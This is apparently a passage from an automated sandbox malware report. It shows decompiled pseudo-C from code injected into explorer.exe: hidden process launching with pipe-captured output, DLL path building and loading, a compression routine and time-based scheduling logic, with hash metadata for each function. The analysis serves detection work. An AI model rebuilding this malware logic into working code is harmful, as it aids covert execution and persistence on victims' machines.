                  						_t77 =  *0x9e684; // 0x293f8f0
                  						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                  					}
                  					if(_v8 != 0) {
                  						_t115 =  *0x9e684; // 0x293f8f0
                  						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                  					}
                  					return _t111;
                  				}
                  				_t79 = _v16;
                  				_v76 = _t79;
                  				_v80 = _t79;
                  				_v84 = _v12;
                  				_v140 = 0x44;
                  				_v96 = 0x101;
                  				_v92 = 0;
                  				_t126 = E00088604(0x1001);
                  				_v28 = _t126;
                  				if(_t126 == 0) {
                  					goto L18;
                  				}
                  				_push( &_v64);
                  				_push( &_v140);
                  				_t85 =  *0x9e684; // 0x293f8f0
                  				_push(0);
                  				_push(0);
                  				_push(0x8000000);
                  				_push(1);
                  				_push(0);
                  				_push(0);
                  				_push(_v24);
                  				_push(0);
                  				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                  					goto L13;
                  				}
                  				_t87 =  *0x9e684; // 0x293f8f0
                  				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                  				_t89 =  *0x9e684; // 0x293f8f0
                  				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                  				_v24 = _v24 & 0;
                  				do {
                  					_t92 =  *0x9e684; // 0x293f8f0
                  					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                  					 *((char*)(_v24 + _t126)) = 0;
                  					if(_t111 == 0) {
                  						_t127 = E000891A6(_t126, 0);
                  					} else {
                  						_push(0);
                  						_push(_t126);
                  						_v32 = _t127;
                  						_t127 = E00089292(_t127);
                  						E0008861A( &_v32, 0xffffffff);
                  						_t130 = _t130 + 0x14;
                  					}
                  					_t111 = _t127;
                  					_v32 = _t127;
                  				} while (_v36 != 0);
                  				_push( &_v36);
                  				_push(E0008C379(_t127));
                  				_t98 =  *0x9e68c; // 0x293fab8
                  				_push(_t127);
                  				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                  					L12:
                  					_t100 =  *0x9e684; // 0x293f8f0
                  					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                  					_t102 =  *0x9e684; // 0x293f8f0
                  					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                  					goto L13;
                  				}
                  				_t128 = E00089256(_t127);
                  				if(_t128 == 0) {
                  					goto L12;
                  				}
                  				E0008861A( &_v32, 0);
                  				return _t128;
                  			}





































                  APIs
                  • memset.MSVCRT ref: 0008A9F4
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                  • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeapPipe$AllocateFreememset
                  • String ID: D
                  • API String ID: 2365139273-2746444292
                  • Opcode ID: 9c45f9d4e67f21cf4a9ce09d2943a26218555c80a6a1b7a13c3173b9ebd09dde
                  • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                  • Opcode Fuzzy Hash: 9c45f9d4e67f21cf4a9ce09d2943a26218555c80a6a1b7a13c3173b9ebd09dde
                  • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				void _v140;
                  				signed char _t14;
                  				char _t15;
                  				intOrPtr _t20;
                  				void* _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t32;
                  				WCHAR* _t34;
                  				intOrPtr _t35;
                  				struct HINSTANCE__* _t37;
                  				int _t38;
                  				intOrPtr _t46;
                  				void* _t47;
                  				intOrPtr _t50;
                  				void* _t60;
                  				void* _t61;
                  				char _t62;
                  				char* _t63;
                  				void* _t65;
                  				intOrPtr _t66;
                  				char _t68;
                  
                  				_t65 = __esi;
                  				_t61 = __edi;
                  				_t47 = __ebx;
                  				_t50 =  *0x9e688; // 0xb0000
                  				_t14 =  *(_t50 + 0x1898);
                  				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                  					_t15 = E000895E1(_t50, 0xb62);
                  					_t66 =  *0x9e688; // 0xb0000
                  					_t62 = _t15;
                  					_t67 = _t66 + 0xb0;
                  					_v8 = _t62;
                  					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
                  					_t20 =  *0x9e688; // 0xb0000
                  					asm("sbb eax, eax");
                  					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                  					_t63 = "\\";
                  					_t26 =  *0x9e688; // 0xb0000
                  					_t68 = E000892E5(_t26 + 0x1020);
                  					_v12 = _t68;
                  					E000885D5( &_v8);
                  					_t32 =  *0x9e688; // 0xb0000
                  					_t34 = E000892E5(_t32 + 0x122a);
                  					 *0x9e784 = _t34;
                  					_t35 =  *0x9e684; // 0x293f8f0
                  					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                  					_t37 = LoadLibraryW( *0x9e784);
                  					 *0x9e77c = _t37;
                  					if(_t37 == 0) {
                  						_t38 = 0;
                  					} else {
                  						_push(_t37);
                  						_t60 = 0x28;
                  						_t38 = E0008E171(0x9bb48, _t60);
                  					}
                  					 *0x9e780 = _t38;
                  					E0008861A( &_v12, 0xfffffffe);
                  					memset( &_v140, 0, 0x80);
                  					if( *0x9e780 != 0) {
                  						goto L10;
                  					} else {
                  						E0008861A(0x9e784, 0xfffffffe);
                  						goto L8;
                  					}
                  				} else {
                  					L8:
                  					if( *0x9e780 == 0) {
                  						_t46 =  *0x9e6bc; // 0x293fa18
                  						 *0x9e780 = _t46;
                  					}
                  					L10:
                  					return 1;
                  				}
                  			}



























                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: LibraryLoadmemset
                  • String ID: %08x$dll
                  • API String ID: 3406617148-2963171978
                  • Opcode ID: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
                  • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                  • Opcode Fuzzy Hash: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
                  • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 99%
                  			E00092D70(int _a4, signed int _a8) {
                  				int _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				void* __esi;
                  				void* _t137;
                  				signed int _t141;
                  				intOrPtr* _t142;
                  				signed int _t145;
                  				signed int _t146;
                  				intOrPtr _t151;
                  				intOrPtr _t161;
                  				intOrPtr _t162;
                  				intOrPtr _t167;
                  				intOrPtr _t170;
                  				signed int _t172;
                  				intOrPtr _t173;
                  				int _t184;
                  				intOrPtr _t185;
                  				intOrPtr _t188;
                  				signed int _t189;
                  				void* _t195;
                  				int _t202;
                  				int _t208;
                  				intOrPtr _t217;
                  				signed int _t218;
                  				int _t219;
                  				intOrPtr _t220;
                  				signed int _t221;
                  				signed int _t222;
                  				int _t224;
                  				int _t225;
                  				signed int _t227;
                  				intOrPtr _t228;
                  				int _t232;
                  				int _t234;
                  				signed int _t235;
                  				int _t239;
                  				void* _t240;
                  				int _t245;
                  				int _t252;
                  				signed int _t253;
                  				int _t254;
                  				void* _t257;
                  				void* _t258;
                  				int _t259;
                  				intOrPtr _t260;
                  				int _t261;
                  				signed int _t269;
                  				signed int _t271;
                  				intOrPtr* _t272;
                  				void* _t273;
                  
                  				_t253 = _a8;
                  				_t272 = _a4;
                  				_t3 = _t272 + 0xc; // 0x452bf84d
                  				_t4 = _t272 + 0x2c; // 0x8df075ff
                  				_t228 =  *_t4;
                  				_t137 =  *_t3 + 0xfffffffb;
                  				_t229 =  <=  ? _t137 : _t228;
                  				_v16 =  <=  ? _t137 : _t228;
                  				_t269 = 0;
                  				_a4 =  *((intOrPtr*)( *_t272 + 4));
                  				asm("o16 nop [eax+eax]");
                  				while(1) {
                  					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                  					_t141 =  *_t8 + 0x2a >> 3;
                  					_v12 = 0xffff;
                  					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                  					if(_t217 < _t141) {
                  						break;
                  					}
                  					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                  					_t12 = _t272 + 0x5c; // 0x84e85000
                  					_t245 =  *_t11 -  *_t12;
                  					_v8 = _t245;
                  					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                  					_t247 =  <  ? _t195 : _v12;
                  					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                  					if(_t227 >= _v16) {
                  						L7:
                  						if(_t253 != 4) {
                  							L10:
                  							_t269 = 0;
                  							__eflags = 0;
                  						} else {
                  							_t285 = _t227 - _t195;
                  							if(_t227 != _t195) {
                  								goto L10;
                  							} else {
                  								_t269 = _t253 - 3;
                  							}
                  						}
                  						E00095D90(_t272, _t272, 0, 0, _t269);
                  						_t18 = _t272 + 0x14; // 0xc703f045
                  						_t19 = _t272 + 8; // 0x8d000040
                  						 *( *_t18 +  *_t19 - 4) = _t227;
                  						_t22 = _t272 + 0x14; // 0xc703f045
                  						_t23 = _t272 + 8; // 0x8d000040
                  						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                  						_t26 = _t272 + 0x14; // 0xc703f045
                  						_t27 = _t272 + 8; // 0x8d000040
                  						 *( *_t26 +  *_t27 - 2) =  !_t227;
                  						_t30 = _t272 + 0x14; // 0xc703f045
                  						_t31 = _t272 + 8; // 0x8d000040
                  						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                  						E00094AF0(_t285,  *_t272);
                  						_t202 = _v8;
                  						_t273 = _t273 + 0x14;
                  						if(_t202 != 0) {
                  							_t208 =  >  ? _t227 : _t202;
                  							_v8 = _t208;
                  							_t36 = _t272 + 0x38; // 0xf47d8bff
                  							_t37 = _t272 + 0x5c; // 0x84e85000
                  							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                  							_t273 = _t273 + 0xc;
                  							_t252 = _v8;
                  							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                  							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                  							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                  							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                  							_t227 = _t227 - _t252;
                  						}
                  						if(_t227 != 0) {
                  							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
                  							_t273 = _t273 + 0xc;
                  							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                  							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                  							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                  						}
                  						_t253 = _a8;
                  						if(_t269 == 0) {
                  							continue;
                  						}
                  					} else {
                  						if(_t227 != 0 || _t253 == 4) {
                  							if(_t253 != 0 && _t227 == _t195) {
                  								goto L7;
                  							}
                  						}
                  					}
                  					break;
                  				}
                  				_t142 =  *_t272;
                  				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                  				_a4 = _t232;
                  				if(_t232 == 0) {
                  					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                  					_t254 =  *_t83;
                  				} else {
                  					_t59 = _t272 + 0x2c; // 0x8df075ff
                  					_t224 =  *_t59;
                  					if(_t232 < _t224) {
                  						_t65 = _t272 + 0x3c; // 0x830cc483
                  						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                  						_t260 =  *_t66;
                  						__eflags =  *_t65 - _t260 - _t232;
                  						if( *_t65 - _t260 <= _t232) {
                  							_t67 = _t272 + 0x38; // 0xf47d8bff
                  							_t261 = _t260 - _t224;
                  							 *(_t272 + 0x6c) = _t261;
                  							memcpy( *_t67,  *_t67 + _t224, _t261);
                  							_t70 = _t272 + 0x16b0; // 0xdf750008
                  							_t188 =  *_t70;
                  							_t273 = _t273 + 0xc;
                  							_t232 = _a4;
                  							__eflags = _t188 - 2;
                  							if(_t188 < 2) {
                  								_t189 = _t188 + 1;
                  								__eflags = _t189;
                  								 *(_t272 + 0x16b0) = _t189;
                  							}
                  						}
                  						_t73 = _t272 + 0x38; // 0xf47d8bff
                  						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                  						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                  						_t225 = _a4;
                  						_t273 = _t273 + 0xc;
                  						_t76 = _t272 + 0x6c;
                  						 *_t76 =  *(_t272 + 0x6c) + _t225;
                  						__eflags =  *_t76;
                  						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                  						_t184 =  *_t78;
                  						_t79 = _t272 + 0x2c; // 0x8df075ff
                  						_t239 =  *_t79;
                  					} else {
                  						 *(_t272 + 0x16b0) = 2;
                  						_t61 = _t272 + 0x38; // 0xf47d8bff
                  						memcpy( *_t61,  *_t142 - _t224, _t224);
                  						_t62 = _t272 + 0x2c; // 0x8df075ff
                  						_t184 =  *_t62;
                  						_t273 = _t273 + 0xc;
                  						_t225 = _a4;
                  						_t239 = _t184;
                  						 *(_t272 + 0x6c) = _t184;
                  					}
                  					_t254 = _t184;
                  					 *(_t272 + 0x5c) = _t184;
                  					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                  					_t185 =  *_t81;
                  					_t240 = _t239 - _t185;
                  					_t241 =  <=  ? _t225 : _t240;
                  					_t242 = ( <=  ? _t225 : _t240) + _t185;
                  					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                  				}
                  				if( *(_t272 + 0x16c0) < _t254) {
                  					 *(_t272 + 0x16c0) = _t254;
                  				}
                  				if(_t269 == 0) {
                  					_t218 = _a8;
                  					__eflags = _t218;
                  					if(_t218 == 0) {
                  						L34:
                  						_t89 = _t272 + 0x3c; // 0x830cc483
                  						_t219 =  *_t272;
                  						_t145 =  *_t89 - _t254 - 1;
                  						_a4 =  *_t272;
                  						_t234 = _t254;
                  						_v16 = _t145;
                  						_v8 = _t254;
                  						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                  						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                  							_v8 = _t254;
                  							_t95 = _t272 + 0x5c; // 0x84e85000
                  							_a4 = _t219;
                  							_t234 = _t254;
                  							_t97 = _t272 + 0x2c; // 0x8df075ff
                  							__eflags =  *_t95 -  *_t97;
                  							if( *_t95 >=  *_t97) {
                  								_t98 = _t272 + 0x2c; // 0x8df075ff
                  								_t167 =  *_t98;
                  								_t259 = _t254 - _t167;
                  								_t99 = _t272 + 0x38; // 0xf47d8bff
                  								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                  								 *(_t272 + 0x6c) = _t259;
                  								memcpy( *_t99, _t167 +  *_t99, _t259);
                  								_t103 = _t272 + 0x16b0; // 0xdf750008
                  								_t170 =  *_t103;
                  								_t273 = _t273 + 0xc;
                  								__eflags = _t170 - 2;
                  								if(_t170 < 2) {
                  									_t172 = _t170 + 1;
                  									__eflags = _t172;
                  									 *(_t272 + 0x16b0) = _t172;
                  								}
                  								_t106 = _t272 + 0x2c; // 0x8df075ff
                  								_t145 = _v16 +  *_t106;
                  								__eflags = _t145;
                  								_a4 =  *_t272;
                  								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                  								_t234 =  *_t108;
                  								_v8 = _t234;
                  							}
                  						}
                  						_t255 = _a4;
                  						_t220 =  *((intOrPtr*)(_a4 + 4));
                  						__eflags = _t145 - _t220;
                  						_t221 =  <=  ? _t145 : _t220;
                  						_t146 = _t221;
                  						_a4 = _t221;
                  						_t222 = _a8;
                  						__eflags = _t146;
                  						if(_t146 != 0) {
                  							_t114 = _t272 + 0x38; // 0xf47d8bff
                  							E00094C30(_t255,  *_t114 + _v8, _t146);
                  							_t273 = _t273 + 0xc;
                  							_t117 = _t272 + 0x6c;
                  							 *_t117 =  *(_t272 + 0x6c) + _a4;
                  							__eflags =  *_t117;
                  							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                  							_t234 =  *_t119;
                  						}
                  						__eflags =  *(_t272 + 0x16c0) - _t234;
                  						if( *(_t272 + 0x16c0) < _t234) {
                  							 *(_t272 + 0x16c0) = _t234;
                  						}
                  						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                  						_t123 = _t272 + 0xc; // 0x452bf84d
                  						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                  						__eflags = _t257 - 0xffff;
                  						_t258 =  >  ? 0xffff : _t257;
                  						_t124 = _t272 + 0x2c; // 0x8df075ff
                  						_t151 =  *_t124;
                  						_t125 = _t272 + 0x5c; // 0x84e85000
                  						_t235 = _t234 -  *_t125;
                  						__eflags = _t258 - _t151;
                  						_t152 =  <=  ? _t258 : _t151;
                  						__eflags = _t235 - ( <=  ? _t258 : _t151);
                  						if(_t235 >= ( <=  ? _t258 : _t151)) {
                  							L49:
                  							__eflags = _t235 - _t258;
                  							_t154 =  >  ? _t258 : _t235;
                  							_a4 =  >  ? _t258 : _t235;
                  							__eflags = _t222 - 4;
                  							if(_t222 != 4) {
                  								L53:
                  								_t269 = 0;
                  								__eflags = 0;
                  							} else {
                  								_t161 =  *_t272;
                  								__eflags =  *(_t161 + 4);
                  								_t154 = _a4;
                  								if( *(_t161 + 4) != 0) {
                  									goto L53;
                  								} else {
                  									__eflags = _t154 - _t235;
                  									if(_t154 != _t235) {
                  										goto L53;
                  									} else {
                  										_t269 = _t222 - 3;
                  									}
                  								}
                  							}
                  							_t131 = _t272 + 0x38; // 0xf47d8bff
                  							_t132 = _t272 + 0x5c; // 0x84e85000
                  							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                  							_t134 = _t272 + 0x5c;
                  							 *_t134 =  *(_t272 + 0x5c) + _a4;
                  							__eflags =  *_t134;
                  							E00094AF0( *_t134,  *_t272);
                  						} else {
                  							__eflags = _t235;
                  							if(_t235 != 0) {
                  								L46:
                  								__eflags = _t222;
                  								if(_t222 != 0) {
                  									_t162 =  *_t272;
                  									__eflags =  *(_t162 + 4);
                  									if( *(_t162 + 4) == 0) {
                  										__eflags = _t235 - _t258;
                  										if(_t235 <= _t258) {
                  											goto L49;
                  										}
                  									}
                  								}
                  							} else {
                  								__eflags = _t222 - 4;
                  								if(_t222 == 4) {
                  									goto L46;
                  								}
                  							}
                  						}
                  						asm("sbb edi, edi");
                  						_t271 =  ~_t269 & 0x00000002;
                  						__eflags = _t271;
                  						return _t271;
                  					} else {
                  						__eflags = _t218 - 4;
                  						if(_t218 == 4) {
                  							goto L34;
                  						} else {
                  							_t173 =  *_t272;
                  							__eflags =  *(_t173 + 4);
                  							if( *(_t173 + 4) != 0) {
                  								goto L34;
                  							} else {
                  								_t88 = _t272 + 0x5c; // 0x84e85000
                  								__eflags = _t254 -  *_t88;
                  								if(_t254 !=  *_t88) {
                  									goto L34;
                  								} else {
                  									return 1;
                  								}
                  							}
                  						}
                  					}
                  				} else {
                  					return 3;
                  				}
                  			}























































                  APIs
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                  • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                  				char _v516;
                  				char _v556;
                  				char _v564;
                  				char _v568;
                  				char _v572;
                  				char _v576;
                  				intOrPtr _v580;
                  				char _v588;
                  				signed int _v596;
                  				intOrPtr _v602;
                  				intOrPtr _v604;
                  				char _v608;
                  				CHAR* _v612;
                  				CHAR* _v616;
                  				signed int _v620;
                  				signed int _v624;
                  				signed int _v628;
                  				signed int _v632;
                  				char _v636;
                  				intOrPtr _t119;
                  				signed int _t122;
                  				CHAR* _t124;
                  				intOrPtr _t125;
                  				CHAR* _t127;
                  				WCHAR* _t130;
                  				intOrPtr _t133;
                  				intOrPtr _t137;
                  				WCHAR* _t138;
                  				intOrPtr _t142;
                  				WCHAR* _t143;
                  				CHAR* _t144;
                  				intOrPtr _t145;
                  				intOrPtr _t150;
                  				intOrPtr _t153;
                  				WCHAR* _t154;
                  				signed int _t159;
                  				WCHAR* _t160;
                  				intOrPtr _t163;
                  				intOrPtr _t165;
                  				intOrPtr _t166;
                  				intOrPtr _t170;
                  				signed int _t173;
                  				signed int _t178;
                  				intOrPtr _t182;
                  				WCHAR* _t184;
                  				char _t186;
                  				WCHAR* _t188;
                  				intOrPtr _t200;
                  				intOrPtr _t211;
                  				signed int _t215;
                  				char _t220;
                  				WCHAR* _t231;
                  				intOrPtr _t235;
                  				intOrPtr _t238;
                  				intOrPtr _t239;
                  				intOrPtr _t246;
                  				signed int _t248;
                  				WCHAR* _t249;
                  				CHAR* _t250;
                  				intOrPtr _t262;
                  				void* _t271;
                  				intOrPtr _t272;
                  				signed int _t277;
                  				void* _t278;
                  				intOrPtr _t280;
                  				signed int _t282;
                  				void* _t298;
                  				void* _t299;
                  				intOrPtr _t305;
                  				CHAR* _t326;
                  				void* _t328;
                  				WCHAR* _t329;
                  				intOrPtr _t331;
                  				WCHAR* _t333;
                  				signed int _t335;
                  				intOrPtr* _t337;
                  				void* _t338;
                  				void* _t339;
                  				void* _t353;
                  
                  				_t353 = __fp0;
                  				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                  				_t119 =  *0x9e688; // 0xb0000
                  				_v620 = _v620 & 0x00000000;
                  				_t328 = __ecx;
                  				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                  					L7:
                  					_t14 = E0008B7A8(0x9b9c8,  &_v516) + 1; // 0x1
                  					E0008A86D( &_v556, _t14, _t351);
                  					_t298 = 0x64;
                  					_t122 = E0008A471( &_v556, _t298);
                  					 *0x9e748 = _t122;
                  					if(_t122 != 0) {
                  						_push(0x4e5);
                  						_t299 = 0x10;
                  						 *0x9e680 = E0008E1BC(0x9b9cc, _t299);
                  						 *_t337 = 0x610;
                  						_t124 = E000895E1(0x9b9cc);
                  						_push(0);
                  						_push(_t124);
                  						_v612 = _t124;
                  						_t125 =  *0x9e688; // 0xb0000
                  						_t127 = E000892E5(_t125 + 0x228);
                  						_t338 = _t337 + 0xc;
                  						_v616 = _t127;
                  						E000885D5( &_v612);
                  						_t130 = E0008B269(_t127);
                  						_t246 = 3;
                  						__eflags = _t130;
                  						if(_t130 != 0) {
                  							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                  							 *_t328 = _t246;
                  						}
                  						E0008861A( &_v616, 0xfffffffe);
                  						_t133 =  *0x9e688; // 0xb0000
                  						_t22 = _t133 + 0x114; // 0xb0114
                  						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                  						_t262 =  *0x9e688; // 0xb0000
                  						_t339 = _t338 + 0x14;
                  						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                  						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                  							L17:
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							_v572 = _t328;
                  							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                  							_t137 =  *0x9e680; // 0x0
                  							_t138 =  *(_t137 + 8);
                  							__eflags = _t138;
                  							if(_t138 != 0) {
                  								 *_t138(0, 0, 1,  &_v568,  &_v564);
                  							}
                  							_v620 = _v620 & 0x00000000;
                  							E0008E2C6(_t353,  &_v576);
                  							_pop(_t262);
                  							_t142 =  *0x9e6b4; // 0x293fa98
                  							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                  							__eflags = _t143;
                  							if(_t143 == 0) {
                  								E0008E2C6(_t353,  &_v588);
                  								_t235 =  *0x9e6b4; // 0x293fa98
                  								_pop(_t262);
                  								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                  							}
                  							__eflags =  *0x9e73c;
                  							if( *0x9e73c <= 0) {
                  								goto L36;
                  							} else {
                  								_t165 =  *0x9e680; // 0x0
                  								__eflags =  *(_t165 + 8);
                  								if( *(_t165 + 8) != 0) {
                  									_t231 =  *(_t165 + 0xc);
                  									__eflags = _t231;
                  									if(_t231 != 0) {
                  										 *_t231(_v580);
                  									}
                  								}
                  								_t166 =  *0x9e688; // 0xb0000
                  								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                  								__eflags = _t262 - _t246;
                  								if(_t262 == _t246) {
                  									goto L36;
                  								} else {
                  									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                  									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                  										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                  										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                  											E000849A5();
                  											asm("stosd");
                  											asm("stosd");
                  											asm("stosd");
                  											asm("stosd");
                  											_t170 =  *0x9e684; // 0x293f8f0
                  											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                  											_t262 = _v602;
                  											_t248 = 0x3c;
                  											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                  											_v596 = _t173;
                  											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                  											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                  											_v624 = _t178;
                  											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                  											_t182 =  *0x9e688; // 0xb0000
                  											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                  											_t339 = _t339 + 0xc;
                  											__eflags = _t184;
                  											if(_t184 >= 0) {
                  												_t333 = E00088604(0x1000);
                  												_v616 = _t333;
                  												_pop(_t262);
                  												__eflags = _t333;
                  												if(_t333 != 0) {
                  													_t186 = E0008109A(_t262, 0x148);
                  													_t305 =  *0x9e688; // 0xb0000
                  													_v636 = _t186;
                  													_push(_t305 + 0x648);
                  													_push(0xa);
                  													_push(7);
                  													_t271 = 2;
                  													E0008902D(_t271,  &_v572);
                  													_t272 =  *0x9e688; // 0xb0000
                  													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                  													_t339 = _t339 + 0x18;
                  													_v632 = _t188;
                  													__eflags = _t188;
                  													if(_t188 != 0) {
                  														_push(_v624 % _t248 & 0x0000ffff);
                  														_push(_v628 & 0x0000ffff);
                  														_push(_v596 % _t248 & 0x0000ffff);
                  														_push(_v620 & 0x0000ffff);
                  														_push(_v632);
                  														_push( &_v572);
                  														_t200 =  *0x9e688; // 0xb0000
                  														__eflags = _t200 + 0x1020;
                  														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
                  														E000885D5( &_v636);
                  														E0008A911(_t333, 0, 0xbb8, 1);
                  														E0008861A( &_v632, 0xfffffffe);
                  														_t339 = _t339 + 0x44;
                  													}
                  													E0008861A( &_v616, 0xfffffffe);
                  													_pop(_t262);
                  												}
                  											}
                  										}
                  										goto L36;
                  									}
                  									__eflags = _t262 - 2;
                  									if(_t262 != 2) {
                  										goto L36;
                  									}
                  									E000849A5();
                  									asm("stosd");
                  									asm("stosd");
                  									asm("stosd");
                  									asm("stosd");
                  									_t211 =  *0x9e684; // 0x293f8f0
                  									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                  									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                  									_v628 = _t215;
                  									_t277 = 0x3c;
                  									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                  									_t249 = E00088604(0x1000);
                  									_v624 = _t249;
                  									_pop(_t278);
                  									__eflags = _t249;
                  									if(_t249 != 0) {
                  										_t220 = E000895E1(_t278, 0x32d);
                  										_t280 =  *0x9e688; // 0xb0000
                  										_push(_t280 + 0x228);
